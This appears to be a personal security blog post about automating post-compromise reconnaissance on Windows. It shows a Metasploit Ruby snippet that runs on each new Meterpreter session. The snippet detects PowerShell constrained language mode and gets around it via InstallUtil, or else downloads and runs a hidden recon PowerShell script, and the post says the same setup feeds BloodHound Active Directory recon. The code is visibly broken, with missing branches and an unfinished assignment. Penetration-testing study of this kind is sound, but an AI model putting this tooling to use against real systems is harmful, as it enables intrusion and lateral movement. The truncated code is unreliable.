Back to home

Automate the Reconnaissance Phase

If you have been reading my OSEP (PEN300) post series, you know that I love automating things, reconnaissance phase is one of the repetitive tasks that you do for each machine you compromise right.

In this post, I am going to share with you how I took advantage of the existing scripts and tools to create let’s say a reconnaissance script bundle.

The script is written into Powershell, the language has a rich API and special when it allow us to load .NET Assembly this make it super powerful and the right tool for the task.

Before we go any further, there is a little caveat here, the script was made for Windows machines only. That being said the way I wrote the script has the following workflow:

This script gets executed for each new Meterpreter session, the way the script gets executed depends of the environment, if the for instance the current session has Powershell restricted language enabled the script get executed by leveraging InstallUtils otherwise it gets run from session shell.

def is_restricted_language?
	cmd = $powershell.execute_command('$ExecutionContext.SessionState.LanguageMode')
	return true if cmd.include? 'ConstrainedLanguage'

def start_powershell_recon_script
	process = nil
	if is_restricted_language?
		print_status("\tPowershell restricted language is enabled")
		process = session.sys.process.execute('C:\\Windows\\System32\\cmd.exe',
		generate_cmd_arg_installutils_instance('recon.exe'), { 'Hidden' => true })
		process = session.sys.process.execute('C:\\Windows\\System32\\cmd.exe',
		generate_cmd_arg_pwsh_download_exec('recon.ps1'), { 'Hidden' => true })
	pid =
	if pid
		print_good("\tPowershell recon script started running in background: PID #{pid}")
		print_error("\tFailed starting powershell recon script")

Having this in place, made life more easier, also the advantage of this is that each time you compromise a new credentials, execute an MSF agent so it runs the BloodHound AD reconnaissance, which comes really handy at the lateral movement phase.

Please note that this script is noisy and not OPSEC safe, it was written to do the heavy lifting for us in internal pentest engagement not for red team engagements.

You can find the full Powershell script here:



Please feel free to ping me on Twitter @tahadraidia or on Mastodon Also you can find more of my work at